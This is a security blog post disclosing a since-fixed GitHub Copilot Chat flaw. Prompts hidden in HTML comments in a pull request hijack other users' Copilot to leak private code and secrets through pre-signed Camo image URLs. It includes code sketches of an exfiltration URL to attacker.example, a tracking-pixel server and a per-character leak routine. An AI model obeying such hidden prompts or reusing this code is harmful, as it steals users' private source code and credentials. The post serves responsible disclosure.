https://www.legitsecurity.com/blog/camoleak-critical-github-copilot-vulnerability-leaks-private-source-code
CamoLeak: Critical GitHub Copilot Vulnerability Leaks Private Source
Code
Written by Omer Mayraz
Published on October 08, 2025 | Updated on October 08, 2025
Get details on our discovery of a critical vulnerability in GitHub
Copilot Chat.
TL;DR:
In June 2025, I found a critical vulnerability in GitHub Copilot Chat
(CVSS 9.6) that allowed silent exfiltration of secrets and source
code from private repos, and gave me full control over Copilot's
responses, including suggesting malicious code or links.
The attack combined a novel CSP bypass using GitHub's own
infrastructure with remote prompt injection. I reported it via
HackerOne, and GitHub fixed it by disabling image rendering in
Copilot Chat completely.
Background
GitHub Copilot Chat is an AI assistant built into GitHub that helps
developers by answering questions, explaining code, and suggesting
implementations directly in their workflow.
Copilot Chat is context-aware: it can use information from the
repository (such as code, commits, or pull requests) to provide
tailored answers.
As always, more context = more attack surface.
Finding the prompt injection
As mentioned earlier, GitHub Copilot is context-aware - so I set out
to make it notice me. To do this, I embedded a prompt directed at
Copilot inside a pull request description.
But what's the point if everyone can see it? Luckily, GitHub came to
the rescue with a proper solution: invisible comments are an official
feature! You can find more details in their documentation: Hiding
content with comments. Simply wrap the content you want to hide in an
HTML comment (<!-- like this -->), and it disappears from the
rendered page.
I tried the same prompt but this time as a hidden comment inside the
PR description, and it worked!
Interestingly, posting a hidden comment triggers the usual PR
notification to the repo owner, but the content of the hidden comment
isn't revealed anywhere.
I then logged in as a different user and visited the pull request
page. The prompt was injected into that user's context as well!
I then replaced the original "HOORAY" prompt with far more complex
instructions, including code suggestions and Markdown rendering, and
to my surprise, they worked flawlessly!
For instance, notice how effortlessly Copilot suggests this
malicious Copilotevil package.
* Notice that the user who asked Copilot Chat to explain the PR is
different from the user who posted the invisible prompt,
demonstrating that the prompt can affect any user who visits the
page.
Copilot operates with the same permissions as the user making the
request, but it obviously needs access to the user's private
repositories to respond accurately. We can exploit this by including
instructions in our injected prompt to access a victim user's private
repository, encode its contents in base16, and append it to a URL.
Then, when the user clicks the URL, the data is exfiltrated back to
us.
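The encoding step is trivial to sketch; this is roughly what the injected instructions ask Copilot to produce. The attacker endpoint and parameter name here are hypothetical placeholders, not values from the actual exploit:

```python
def encode_for_exfil(data: str) -> str:
    # Base16 (hex) encoding keeps arbitrary file contents URL-safe.
    return data.encode("utf-8").hex()

def exfil_url(data: str) -> str:
    # Hypothetical attacker-controlled endpoint; when the victim
    # clicks the link, the encoded private data reaches the attacker.
    return "https://attacker.example/leak?d=" + encode_for_exfil(data)
```

The victim sees an innocuous-looking link; the hex blob in the query string is their private repo content.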
* Notice that the repository
https://github.com/LegitSecurity/issues-service is a private repo
inside a private GitHub organization!
Recap: What We Can Do
* Influence the responses generated by another user's Copilot
* Inject custom Markdown, including URLs, code, and images
* Exploit the fact that Copilot runs with the same permissions as
the victim user
Bypassing Content Security Policy (CSP)
This is where things get tricky. If you've followed along so far,
you're probably thinking: just inject an HTML <img> tag into the
victim's chat, encode their private data as a URL parameter, and once
the browser tries to render it, the data will be leaked.
Not so fast. GitHub enforces a very restrictive Content Security
Policy (CSP), which blocks fetching images and other content types
from domains that aren't explicitly owned by GitHub. So our "simple"
trick won't work out of the box.
You're probably asking yourself - wait, how does my fancy README
manage to show images from third-party sites?
When you commit a README or any Markdown file containing external
images, GitHub automatically processes the file. During this process:
1. GitHub parses the Markdown and identifies any image URLs pointing
to domains outside of GitHub.
2. URL rewriting via Camo: Each external URL is rewritten to a Camo
proxy URL. This URL includes an HMAC-based cryptographic signature
and points to https://camo.githubusercontent.com/....
3. Signed request verification: When a browser requests the image,
the Camo proxy verifies the signature to ensure it was generated
by GitHub. Only valid, signed URLs are allowed.
4. Content fetching: If the signature is valid, Camo fetches the
external image from its original location and serves it through
GitHub's servers.
This process ensures that:
* Attackers cannot craft arbitrary URLs to exfiltrate dynamic data.
* All external images go through a controlled proxy, maintaining
security and integrity.
* The end user sees the image seamlessly in the README, but the
underlying URL never exposes the original domain directly.
More information about Camo can be found here.
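The signing scheme can be sketched from the open-source Camo project that GitHub's proxy is derived from: an HMAC over the target URL using a server-side shared key, with the hex digest and hex-encoded target embedded in the proxy URL. This is a sketch of the public Camo scheme, not GitHub's exact production implementation, and the key is of course known only to the server:

```python
import hashlib
import hmac

def camo_url(target: str, shared_key: bytes) -> str:
    # The proxy later recomputes this HMAC over the target URL and
    # refuses to fetch anything whose digest doesn't match, so an
    # attacker cannot mint valid URLs for new targets on the fly.
    digest = hmac.new(shared_key, target.encode(), hashlib.sha1).hexdigest()
    hex_target = target.encode().hex()
    return f"https://camo.githubusercontent.com/{digest}/{hex_target}"
```

This is exactly why the "obvious" exfiltration image fails: without the shared key, no dynamically constructed URL will ever verify.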
Let's look at an example: commit a README file to GitHub containing
an external image URL, and inside the rendered README it will be
automatically rewritten into a signed camo.githubusercontent.com URL.
Rather than doing it manually through the website, you can use
GitHub's REST API to submit raw Markdown and receive it back with all
external image URLs automatically converted to Camo proxy URLs.
Alright, so we can't generate Camo URLs on the fly. Without code
execution, every <img> tag we inject into the victim's chat must
include a valid Camo URL signature that was pre-generated; otherwise,
GitHub's reverse proxy won't fetch the content.
The discovery
I spent a long time thinking about this problem before this crazy
idea struck me.
If I create a dictionary of all letters and symbols in the alphabet,
pre-generate their corresponding Camo URLs, embed this dictionary
into the injected prompt, and then ask Copilot to play a "small game"
of rendering the content I want to leak as "ASCII art" composed
entirely of images, will Copilot emit valid Camo images that the
browser renders in order? Yes, it will.
I quickly got to work. First, I set up a web server that responds to
every request with a 1x1 transparent pixel. This way, when GitHub's
Camo reverse proxy fetches the images from my server, they remain
invisible in the victim's chat.
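A throwaway pixel server like that is a few lines of Python's standard library. The payload is the classic 43-byte 1x1 transparent GIF; what actually carries the leaked data is the request path (which character's "image" Camo fetched, in what order), which lands in the access log. A sketch, not the actual server used:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Classic 43-byte 1x1 transparent GIF.
PIXEL = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00"
    b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)

class PixelHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Every path gets the same invisible pixel; the per-character
        # paths Camo requests are the exfiltrated signal, logged in
        # rendering order by the default access log.
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

# To run: HTTPServer(("0.0.0.0", 8080), PixelHandler).serve_forever()
```

Because the pixel is transparent, the victim's chat shows nothing unusual while the fetches fire.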
Next, using GitHub's API, I created a valid Camo URL dictionary of
all the letters and symbols that might appear in leaked source code
or issue content: each per-character image URL pointing at my server
turns into a pre-signed Camo URL.
And finally, I created the injected prompt itself.
* I added a "random" parameter at the end of each Camo URL and
instructed Copilot to generate a new random number each time and
append it to the URL; this way, caching is not a problem.
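Putting the pieces together, the behavior the injected prompt coaxes out of Copilot looks roughly like this. The dictionary values are placeholders standing in for real pre-signed Camo URLs, and the parameter name is illustrative:

```python
import random

def leak_as_images(secret: str, camo_dict: dict[str, str]) -> list[str]:
    # One pre-signed Camo URL per character, emitted in order; the
    # victim's browser fetches them one by one, spelling out the
    # secret in the attacker's access log.
    urls = []
    for ch in secret:
        cache_buster = random.randint(0, 10**6)  # defeat Camo caching
        urls.append(f"{camo_dict[ch]}?r={cache_buster}")
    return urls
```

Copilot does the equivalent of this loop "in its head" when asked to render the leak as per-character ASCII art.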
Our target: the description of a zero-day vulnerability inside an
issue of a private project.
The result: Stealing zero days from private repositories.
[Video: PoC showcasing the full attack (4 minutes)]
I also managed to get Copilot to search the victim's entire codebase
for the keyword "AWS_KEY" and exfiltrate the result.
GitHub's Response
GitHub reports that the vulnerability was fixed as of August 14.
To learn more
Get details on a previous vulnerability we unearthed in GitLab Duo.
Get our thoughts on AppSec in the age of AI.